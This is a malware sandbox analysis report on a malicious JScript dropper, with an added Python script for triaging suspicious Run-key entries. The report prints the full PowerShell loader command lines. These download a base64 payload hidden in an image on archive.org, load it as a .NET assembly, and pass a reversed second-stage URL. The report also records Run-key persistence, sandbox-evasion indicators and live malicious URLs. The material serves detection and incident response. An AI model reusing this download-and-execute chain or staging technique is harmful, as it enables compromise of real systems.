        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F200BD pushad ; iretd 2_2_00007FF848F200C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FF848F200BD pushad ; iretd 4_2_00007FF848F200C1

        Boot Survival

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\neuromo.js
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path (2 further modifications of the same value; data not shown in the report)
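The Run value above names no script host at all: a bare .js path is handed to the file-association handler, which for .js is wscript.exe by default, so a detection that only looks for wscript.exe or powershell.exe in Run values misses it. The following Python is an added example, not part of the report, of the check a responder would run over Run entries. On Windows, `read_hkcu_run` enumerates HKCU\Software\Microsoft\Windows\CurrentVersion\Run through the standard `winreg` module; elsewhere the constructed `SAMPLE_ENTRIES` list stands in for that output, with the value from this report (name Path, data C:\ProgramData\neuromo.js, as the report prints it) alongside three invented entries for contrast.

```python
import ntpath
import re
import sys

SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1", ".bat", ".cmd"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "rundll32.exe", "regsvr32.exe"}
# Locations a normal user can write to; signed software rarely autostarts from them.
WRITABLE_ROOTS = (r"c:\programdata", r"c:\users\public", r"c:\windows\temp",
                  r"\appdata\local\temp", r"\appdata\roaming")

# Constructed stand-in for the live Run key. The first entry reproduces the
# value from this report; the other three are invented for contrast.
SAMPLE_ENTRIES = [
    ("Path", r"C:\ProgramData\neuromo.js"),
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("Updater", r'wscript.exe //B "C:\Users\alice\AppData\Roaming\upd.vbs"'),
    ("Agent", r'"C:\Program Files\Vendor\agent.exe" --tray'),
]


def _tokens(command: str) -> list:
    """Split a Run value into arguments, keeping double-quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command)]


def assess_run_value(name: str, command: str) -> list:
    """Return the reasons a Run value looks like script-based persistence.

    A bare script path (as in this report) is flagged on its extension alone,
    because Explorer passes such a value to the file-association handler and
    no script host ever appears in the value itself.
    """
    reasons = []
    tokens = [t.lower() for t in _tokens(command)]
    if not tokens:
        return reasons
    host = ntpath.basename(tokens[0])
    if host in SCRIPT_HOSTS:
        reasons.append(f"launched via script host {host}")
    for tok in tokens:
        if ntpath.splitext(tok)[1] in SCRIPT_EXTENSIONS:
            reasons.append(f"script payload {tok}")
        if any(root in tok for root in WRITABLE_ROOTS):
            reasons.append(f"user-writable location in {tok}")
    return reasons


def triage(entries) -> dict:
    """Map each suspicious value name to its reasons; clean entries are omitted."""
    result = {}
    for name, command in entries:
        reasons = assess_run_value(name, command)
        if reasons:
            result[name] = reasons
    return result


def read_hkcu_run() -> list:
    """Enumerate HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run (Windows only)."""
    if sys.platform != "win32":
        return []
    import winreg
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                        r"Software\Microsoft\Windows\CurrentVersion\Run") as key:
        index = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, index)
            except OSError:  # raised once index runs past the last value
                break
            entries.append((name, str(data)))
            index += 1
    return entries


if __name__ == "__main__":
    for value_name, why in triage(read_hkcu_run() or SAMPLE_ENTRIES).items():
        print(value_name, "->", "; ".join(why))
```

The report's entry is flagged twice (script extension and a ProgramData path); the invented OneDrive and vendor-agent entries pass because a .exe under Program Files or the user's own AppData\Local\Microsoft tree matches none of the rules. The same function can be pointed at HKLM or at the RunOnce keys by changing the hive and path in `read_hkcu_run`.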
        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (166 occurrences)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1999
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 354
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3230
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6546
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888 Thread sleep count: 3230 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220 Thread sleep count: 6546 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968 Thread sleep time: -16602069666338586s >= -30000s
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Note: 922337203685477 is TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks / 10000), so the delays carrying this value are effectively unbounded waits rather than a finite timed delay; the long-sleep signature fires on the magnitude alone.
        Source: powershell.exe, 00000004.00000002.2221743469.000001C26C990000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
        Source: wscript.exe, 00000000.00000002.2059973474.0000027BE47AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match | File source: amsi64_6800.amsi.csv, type: OTHER
        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5752, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6800, type: MEMORYSTR
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? 
?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mq? ? ? ? ?w? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?z? ? ? ? ?bl? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bo? ? ? ? ?g4? ? ? ? ?bwb0? ? ? ? ?gu? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?v? ? ? ? ?gq? ? ? ? ?zqbh? ? ? ? ?hq? ? ? ? ?a? ? ? ? ?bu? ? ? ? ?g8? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?c4? ? ? ? ?agbw? ? ? ? ?gc? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?tgbl? ? ? ? ?hc? ? ? ? ?lqbp? ? ? ? ?gi? ? ? ? ?agbl? ? ? ? ?gm? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?tgbl? ? ? ? ?hq? ? ? ? ?lgbx? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c4? ? ? ? ?r? ? ? ? ?bv? ? ? ? ?hc? ? ? ? ?bgbs? ? ? ? ?g8? ? ? ? ?yqbk? ? ? ? ?eq? ? ? ? ?yqb0? ? ? ? ?ge? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbv? ? ? ? ?hi? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? 
?gu? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bb? ? ? ? ?fm? ? ? ? ?eqbz? ? ? ? ?hq? ? ? ? ?zqbt? ? ? ? ?c4? ? ? ? ?v? ? ? ? ?bl? ? ? ? ?hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eu? ? ? ? ?bgbj? ? ? ? ?g8? ? ? ? ?z? ? ? ? ?bp? ? ? ? ?g4? ? ? ? ?zwbd? ? ? ? ?do? ? ? ? ?ogbv? ? ? ? ?fq? ? ? ? ?rg? ? ? ? ?4? ? ? ? ?c4? ? ? ? ?rwbl? ? ? ? ?hq? ? ? ? ?uwb0? ? ? ? ?hi? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?k? ? ? ? ?? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?cwb0? ? ? ? ?ge? ? ? ? ?cgb0? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb? ? ? ? ?fm? ? ? ? ?rq? ? ? ? ?2? ? ? ? ?dq? ? ? ? ?xwbt? ? ? ? ?fq? ? ? ? ?qqbs? ? ? ? ?fq? ? ? ? ?pg? ? ? ? ?+? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gu? ? ? ? ?bgbk? ? ? ? ?ey? ? ? ? ?b? ? ? ? ?bh? ? ? ? ?gc? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jw? ? ? ? ?8? ? ? ? ?dw? ? ? ? ?qgbb?
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'c:\programdata\' , 'neuromo','addinprocess32','desativado'))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Counts in parentheses are the report's per-technique signature counts.

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Scripting (22) | Valid Accounts | Command and Scripting Interpreter (11) | Scripting (22) | Process Injection (11) | Virtualization/Sandbox Evasion (21) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Archive Collected Data (1) | Encrypted Channel (11) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | Exploitation for Client Execution (1) | Registry Run Keys / Startup Folder (11) | Registry Run Keys / Startup Folder (11) | Process Injection (11) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | PowerShell (3) | DLL Side-Loading (1) | DLL Side-Loading (1) | Obfuscated Files or Information (2) | Security Account Manager | Virtualization/Sandbox Evasion (21) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Software Packing (1) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (3) | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | System Information Discovery (12) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        Behavior Graph ID: 1491471 | Sample: 15514541_Doc_Sub(C-A0893)10... | Start date: 12/08/2024 | Architecture: WINDOWS | Score: 100

        Sample-level: ia601606.us.archive.org; maso.ge
        Sample-level signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 7 other signatures

        wscript.exe (started)
            Signatures: JScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 4 other signatures
            -> powershell.exe (started)
                Signatures: Suspicious powershell command line found; Found suspicious powershell code related to unpacking or dynamic code loading
                -> powershell.exe (started)
                    Network: ia601606.us.archive.org 207.241.227.86, 443, 49704 INTERNET-ARCHIVEUS United States; maso.ge 195.54.178.4, 443, 49705 ASDELTATELECOMRU Georgia
                    Signatures: Creates autostart registry keys with suspicious values (likely registry only malware)
                    -> cmd.exe (started)
                        -> conhost.exe (started)
                -> conhost.exe (started)

        Source | Detection | Scanner | Label
        15514541_Doc_Sub(C-A0893)10-08-2024.js | 11% | ReversingLabs |
        15514541_Doc_Sub(C-A0893)10-08-2024.js | 12% | Virustotal |
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label
        ia601606.us.archive.org | 0% | Virustotal |
        maso.ge | 14% | Virustotal |
        Source | Detection | Scanner | Label
        http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
        http://www.apache.org/licenses/LICENSE-2.0 | 0% | URL Reputation | safe
        http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
        http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
        https://go.micro | 0% | URL Reputation | safe
        https://contoso.com/ | 0% | URL Reputation | safe
        https://nuget.org/nuget.exe | 0% | URL Reputation | safe
        https://contoso.com/License | 0% | URL Reputation | safe
        https://contoso.com/Icon | 0% | URL Reputation | safe
        https://oneget.orgX | 0% | URL Reputation | safe
        https://aka.ms/pscore6 | 0% | URL Reputation | safe
        https://aka.ms/pscore68 | 0% | URL Reputation | safe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
        https://oneget.org | 0% | URL Reputation | safe
        https://ia601606.us.arXzJ | 0% | Avira URL Cloud | safe
        https://go.microsoft.co | 0% | Avira URL Cloud | safe
        https://maso.ge/wp-admin/sky.txt | 100% | Avira URL Cloud | malware
        http://maso.ge | 100% | Avira URL Cloud | malware
        https://ia601606.us.archive.org/10/items/deathnote | 0% | Avira URL Cloud | safe
        https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg | 100% | Avira URL Cloud | malware
        https://maso.ge/wp-admin/sky.txt | 12% | Virustotal |
        https://go.microsoft.co | 1% | Virustotal |
        https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
        https://ia601606.us.archive.org/10/items/deathnote | 0% | Virustotal |
        https://maso.ge | 100% | Avira URL Cloud | malware
        https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg | 4% | Virustotal |
        http://ia601606.us.archive.org | 0% | Avira URL Cloud | safe
        https://ia601606.us.archive.org | 0% | Avira URL Cloud | safe
        https://github.com/Pester/Pester | 1% | Virustotal |
        https://maso.ge | 14% | Virustotal |
        http://maso.ge | 14% | Virustotal |
        https://ia601606.us.archive.org | 0% | Virustotal |
        http://ia601606.us.archive.org | 0% | Virustotal |

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        ia601606.us.archive.org | 207.241.227.86 | true | true | | unknown
        maso.ge | 195.54.178.4 | true | false | | unknown

        Name | Malicious | Antivirus Detection | Reputation
        https://maso.ge/wp-admin/sky.txt | true | 12% Virustotal; Avira URL Cloud: malware | unknown
        https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg | true | 4% Virustotal; Avira URL Cloud: malware | unknown

        Name | Source | Malicious | Antivirus Detection | Reputation
        https://ia601606.us.arXzJ | powershell.exe, 00000004.00000002.2178327964.000001C20162E000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000004.00000002.2178327964.000001C20167C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://go.microsoft.co | powershell.exe, 00000002.00000002.2259432896.000001D3FED95000.00000004.00000020.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.2178327964.000001C200223000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://go.micro | powershell.exe, 00000004.00000002.2178327964.000001C2010CE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://maso.ge | powershell.exe, 00000004.00000002.2178327964.000001C2003CF000.00000004.00000800.00020000.00000000.sdmp | true | 14% Virustotal; Avira URL Cloud: malware | unknown
        https://contoso.com/ | powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2178327964.000001C201909000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
